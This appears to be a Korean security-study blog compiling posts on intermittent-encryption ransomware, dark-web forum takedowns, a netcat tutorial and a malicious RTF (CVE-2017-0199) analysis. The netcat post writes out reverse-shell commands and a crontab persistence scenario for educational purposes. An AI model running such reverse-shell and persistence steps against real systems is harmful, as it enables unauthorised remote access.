꼰머의 보안공부

1. 개요: 간헐적 암호화

- 최근 랜섬웨어 공격자들은 간헐적 암호화 전략을 사용

- 간헐적 암호화란 암호화 속도를 높이기 위해 파일의 가장 앞부분 혹은 뒷부분만 암호화하는 것

> 블랙캣(BlackCat), 콘티(Conti), 로얄(Royal), 플레이(Play) 등이 이 전략을 활용

- 21년 새롭게 등장한 락파일(LockFile) 랜섬웨어를 유포하기 위해 간헐적 암호화 사용 [1][2][3]

> 파일의 첫 부분 중 일부는 암호화하지 않고, 16바이트마다 한번씩 암호화

> 텍스트 문서와 같은 파일 종류는 부분적으로 읽을 수 있고, 파일 크기 등 통계적으로 원본과 유사함

> 통계 분석을 사용해 콘텐츠 검사에 의존하는 랜섬웨어 탐지 소프트웨어 우회 가능

- 간헐적 암호화의 장단점

> 장점: 암호화 효율(속도)을 높여 보다 많은 파일을 암호화, 높은 탐지 기술 회피력

> 단점: 부분적인 암호화로 복호화 가능성이 높음

2. 화이트피닉스(White Phoenix) [4][5]

- 사이버 보안 기업 사이버아크는 간헐적 암호화의 특징에 초점을 맞춰 파일 복호화 도구 화이트피닉스 발표

> 간헐적 암호화된 파일의 경로와 복호화 될 파일을 저장할 경로만 지정하면 됨

- 간헐적 암호화로 암호화된 파일 중 pdf, docx, docm, xlxm, xltx, extm, pptx, pptm, ptox, zip 등의 파일들을 꽤나 정확하게 복구

> 공격자들이 PDF의 헤더 부분만을 삭제했다고(암호화 했다고) 다음과 같이 상황을 가정

> 오리지널 파일 구조: "Head 123, Body 456, Footer 789"

> 암호화된 파일 구조: "head 12, body 456, footer 789"

> 따라서, 원본을 유추해 복구하는 것이 상대적으로 수월하다는 것

- 현재는 주로 블랙캣이 암호화 한 문서 파일들을 위주로 복호화 기능을 발휘

> 블랙캣은 6가지 암호화 모드를 제공: 파일 헤더 암호화, 파일 일부 암호화, 파일 전체 암호화 등

> 플레이, 킬린(Qilin), 비안리안(BianLian), 다크빗(DarkBit)과 같은 랜섬웨어 피해자 역시 어느 정도 도움을 얻을 수 있을 것

3. 대응방안

① 다중계층방어 보안프로그램 도입

> 랜섬웨어는 하나의 보안기술로는 완벽하게 방어하기 어려움

> 네트워크, End-Point 등에 걸친 다단계 방어가 필요

② 정기적인 패치 및 업데이트 적용

> 랜섬웨어는 소프트웨어의 취약점을 악용해 침투

> 소프트웨어 및 펌웨어를 최신 버전으로 유지

③ 데이터 백업

> 신뢰할 수 있는 매체나 클라우드를 통해 데이터 백업

④ 기본 보안 수칙 준수

> 출처가 불분명한 파일 다운 및 실행 금지/주의

> 메일 내 첨부파일 실행 금지/주의

> USB 등의 외부 저장 매체 통제/비활성화 및 보안성 검토 후 사용

> 보안 교육 수행

4. 참고

[1] https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html
[2] https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/
[3] https://www.ic3.gov/Media/News/2021/210825.pdf
[4] https://www.cyberark.com/resources/threat-research-blog/white-phoenix-beating-intermittent-encryption
[5] https://github.com/cyberark/White-Phoenix
[6] https://www.boannews.com/media/view.asp?idx=117997&page=1&kind=1 

1. 다크웹 해킹 포럼 폐쇄

1. 개요

- 미국 FBI 및 국제 공조로 다크웹 해킹 포럼이 연속적으로 폐쇄

2. 주요내용

- BreachForums 폐쇄

> 22년부터 23년까지 운영된 다크웹 해킹 포럼 (유출 정보 거래)

※ 22년 국제 사법 기관들의 공조로 폐쇄된 레이드포럼(RaidForums)의 대안 및 후속적인 역할 수행

> 주로 거래된 정보는 계좌 정보, 주민번호, 이메일 주소, 유출한 데이터베이스, 침해된 계정 정보 등

> 23년 3월 FBI의 수사로 포럼 운영자 검거 및 포럼 폐쇄

- Genesis Market 폐쇄

> 17년부터 23년까지 운영된 다크웹 해킹 포럼 (유출 정보 거래)

> 주로 거래된 정보는 쿠키, 크리덴셜 정보 등

> 23년 4월 국제 사법 기관들의 공조로 관련 인물 검거 및 포럼 폐쇄 

- Try2Check 폐쇄

> 05년부터 23년까지 운영된 다크웹 해킹 포럼 (카드 정보의 유효성 확인)

> 훔치거나 유출된 카드 정보를 대량으로 구매한 자들이 해당 정보 중 아직 활용 가능한 정보를 확인하기 위해 사용

> 23년 5월 국제 사법 기관들의 공조로 포럼 폐쇄 (운영자는 특정했으나 러시아에 거주 중이라 아직 검거되지 않음)

- 13곳의 DDoS 대행 서비스 폐쇄

>  DDoS 대행 서비스를 부터(Booter) 혹은 스트레서(Stresser)라 부름

> 공격자들은 다른 공격과 섞어 대행 서비스를 이용

> 23년 5월 국제 사법 기관들의 공조로 13곳 폐쇄

- 기타

> 록빗(LockBit) 랜섬웨어 그룹의 지도자급 인물 중 한 명이 캐나다에서 채포

> 레빌(REvil) 랜섬웨어 그룹의 일원 한 명이 폴란드에서 체포

> 랩서스(Lasus$) 해킹 그룹의 일원 한 명이 브라질에서 체포

3. 기타사항

- 다크웹 등을 통한 계정 정보 유출이 지속적으로 발생

> 기업들의 적극적인 조치(비밀번호 변경, 2차 인증 등) 필요

> 정보 유출 방지를 위해 최신 업데이트 적용, 취약점 분석 및 조치, 보안 교육 등 필요

- 폐쇄된 다크웹 해킹 포럼을 대체할 포럼이 지속적으로 생성되는 중으로 주의 필요

> BreachForums의 폐쇄로 어나니머스 출신이라 밝힌 한 인물이 kkksecforum 다크웹 포럼 개설을 트위터를 통해 알림

> 폐쇄된 13곳의 DDoS 대행사 중 10곳은 지난 22.12에 폐쇄된 서비스가 부활한 것

2. 구글, 다크웹 스캔 서비스 제공

1. 개요

- 구글에서 미국 사용자들을 대상으로 다크웹 스캔 서비스를 제공

2. 주요내용

- 미국 내 구글 원(Google One) 서비스 사용자들에게만 제공 중

- 다크웹을 스캔해 이름, 주소, 이메일 주소, 전화번호, 주민등록번호 등이 유통되고 있는지 확인할 수 있게 해 주는 서비스

- 다크웹에 정보가 있는 것으로 보이는 사용자에게는 자동으로 보고서와 권장 조치 사항들이 전달

3. 기타사항

- 관련 보고서를 곧 공개할 예정

1. Netcat (nc)

- TCP 또는 UDP를 사용하여 네트워크 연결을 읽거나 기록하는 컴퓨터 네트워킹 유틸리티

- UNIX의 cat과 유사하며, cat 명령으로 파일을 읽거나 쓰듯이 NC는 Network Connection에 읽거나 씀

- 스크립트와 병용하여 network에 대한 debugging, testing tool로써 매우 편리하지만 반면 해킹에서도 자주 사용

1.1 주요 옵션

1.2 바인드쉘

- 일반적인 연결 상태로, 클라이언트가 서버에 접속

- 서버: nc -lnvp 1234 -e /bin/bash
- 클라이언트: nc <서버 IP> 1234

1.3 리버스쉘

- 바인드쉘과 반대로 서버가 클라이언트에 접속, -e 옵션에 의해 클라이언트에서 작업이 수행됨

> 예시의 경우 클라이언트의 /bin/bash가 실행

> 공격자의 PC가 서버가되고, 피해자의 PC가 클라이언트가 되어 명령을 실행

- 서버: nc -lnvp 1234
- 클라이언트: nc <서버 IP> 1234 -e /bin/bash

- 일반적으로 방화벽은 네트워크 최상단에 설치되어 외부에서 내부로 들어오는 연결을 차단

> 반대로 내부에서 외부로 나가는 연결에 대해서는 상대적으로 허용하는 경우가 많음

> 이를 이용해 공격자는 공격 PC를 서버로 동작시킨 뒤, 피해 PC에서 명령 실행 및 공격 PC로 접근해 쉘을 획득

- 일반적인 리버스쉘 시나리오는 다음과 같음

① 공격자는 내부 네트워크에 침입한 후 무차별대입공격으로 root 계정 탈취

② 반복적인 침입을 위해 root 계정을 이용해 root 권한을 가지는 일반 사용자 계정 생성

③ netcat 프로그램을 이용한 리버스쉘 연결 작업을 cron table에 등록(/etc/crontab)

④ 공격자는 주기적으로 shell을 획득해 추가 명령 수행

2. -e 옵션

- 앞서 살펴보았듯이 -e 옵션은 연결을 생성한 후 실행할 명령 등의 작업을 지정함

- 침해 상황을 가정해 nc를 통해 리버스쉘 연결을 시도한 결과 -e 옵션이 유효하지 않다고 확인됨

- 구글링을 해보니 비활성화된 (또는 지원하지 않는) 버전의 nc를 사용한 결과라고 함

> 따라서, -e 옵션을 지원하는 nc 버전 (netcat-traditional)을 설치하고, 해당 버전으로 설정해야 함

# sudo apt-get install -y netcat-traditional
# sudo update-alternatives --config nc

- 두 번째 명령 실행 결과를 확인해보면 현재 /bin/nc.openbsd 버전을 사용하고 있는 것으로 확인 됨

> 설치한 netcat-traditional (nc.traditional)으로 변경

- 변경 후 -e 옵션을 실행하면 정상적으로 리버스쉘이 생성됨

1.보호조치 기준 개요

- 개인정보의 안전성 확보조치 기준과 개인정보의 기술적ㆍ관리적 보호조치 기준으로 구분할 수 있음

- 기준별 보호조치 요약

- 개인정보의 안전성 확보조치 기준 유형 분류 기준

- 개인정보의 기술적ㆍ관리적 보호조치 기준 적용 대상자

참고

휴대폰에 업데이트 알람이 떠서 확인해보니 보안 대응 업데이트 였다. 조금 찾아봤더니 작년 iOS16 공개와 함께 처음 선보였다고 한다. 정규 업데이트와는 별개로, 장치와 소프트웨어의 보안 문제를 개선 또는 수정하는 내용을 담고 있다고 한다. 그래서 그런지 업데이트 크기가 약 100MB 였고, 순식간에 완료가 되었다.

사파리 웹 브라우저와 Webkit 프레임 워크 스택 또는 기타 중요한 시스템 라이브러리에 대한 개선 사항이 업데이트되는 것이라고 한다. 또한 악용되었거나 존재한다고 보고된 문제 등 일부 보안 문제를 더 빠르게 완화하는 데에도 사용할 수 있다고 한다.

설정 > 소프트웨어 업데이트 > 자동 업데이트 > 보안 대응 및 시스템 파일에서 비활성화할 수 있다. 하지만, 보안과 개인정보를 안전하게 유지하기 위해서는 해당 기능을 활성화하고, 주기적으로 업데이트를 확인하고 적용하는 것이 필요할 것 같다. 또한, 취지에서도 알 수 있듯이 소프트웨어 업데이트 사이에 중요한 보안 개선 사항을 설치하는 기능인만큼 활성화해 두는 것이 좋을 것 같다.

1. 분석 도구

1.1 Virus Total [1]

- 무료로 파일 검사를 제공하는 웹사이트로, 파일, URL 내의 바이러스를 검사해주는 사이트 (IP 조회도 가능)

1.2 HxD [2]

- 파일에 저장된 HEX(16진수) 값을 읽고 수정하는데 이용

1.3 rtfdump.py [3][4]

- Github에서 다운받을 수 있는 파이썬으로 작성된 RTF 파일을 분석하는데 사용되는 Open Source

1.4 oledump.py [8]

- OLE 파일을 분석하는 프로그램

2. 분석

① Virus Total 조회

- 실습에서 진행한 RTF 파일을 Virus Total에서 조회한 결과는 다음과 같음

> 58개의 벤더사 중 39개의 벤더사가 악성 파일로 탐지

> 탐지명을 확인해보면 CVE-2017-0199와 관련된 것임을 알 수 있음

② 파일 속성 및 HxD 조회

- 파일 속성과 HxD 확인 결과 해당 파일이 RTF 파일임을 확인

> RTF 파일은 파일 시그니처로 7B 5C 72 74 66 31 ({rtf1)를 가짐 [5]

③ rtfdump.py 파일 덤프

- 먼저 -m 옵션을 사용해 rtfdump.py의 사용법에 대해 확인

- yeahhub.rtf 파일 덤프 결과 문서에 포함된 객체들이 조회됨

> [사진 5]를 통해 RTF 문서에서 원격 객체와 연결을 하기위해 "objautlink"를 사용하며, 그 중 "objdata"에 OLE 객체를 포함하고 있는것을 확인 [6]

> objautlink ⊃ objdata ⊃ OLE 객체로 정리함

※ [사진 4]에서 첫 번째 열의 숫자는 rtfdump에서 파생된 출력 값으로 파일의 일부가 아님

- 분석 후 추가 구글링 결과 rtfdump.py의 경우 아래 명령으로 문서에 포함된 OLE 객체를 찾을 수 있다고 확인됨

rtfdump.py -f O 파일명

- [사진 4]에서 확인된 objdata의 값을 -s 옵션으로 확인한 결과 "01050000 02000000"이 확인

> "01050000 02000000"는 각각 01050000 OLE 버전 정보, 02000000 임베디드 객체를 뜻함 [7]

> -H 명령을 추가해 확인하면 더욱 명확히 OLE 객체임을 알 수 있음

④ oledump.py

- [사진 7]의 결과에서 두 가지 옵션 추가 및 "|"를 사용해 oledump.py의 입력으로 전달

> -E: 포함된 객체 덤프

> -d: 출력된 내용 덤프

※ [사진 8]에서 첫 번째 열의 숫자는 oledump에서 파생된 출력 값으로 파일의 일부가 아님

- -s 옵션으로 각각의 스트림을 확인한 결과 첫 번째 스트림에서 악성 URL 확인

- [사진 9]에서 확인된 악성 URL로 HTA 파일을 요청하고, HTA 파일에 포함된 리버스쉘 생성 명령이 실행

3. 참고

[1] https://www.virustotal.com/gui/home/upload
[2] https://mh-nexus.de/en/hxd/
[3] https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py
[4] https://blog.didierstevens.com/2016/07/29/releasing-rtfdump-py/
[5] http://forensic-proof.com/archives/300
[6] https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/
[7] https://github.com/houjingyi233/office-exploit-case-study/blob/master/CVE-2017-11882%26CVE-2018-0802%26CVE-2018-0798/cve-2018-0802%20poc%20with%20comments.rtf
[8] https://github.com/DidierStevens/DidierStevensSuite/blob/master/oledump.py

보안뉴스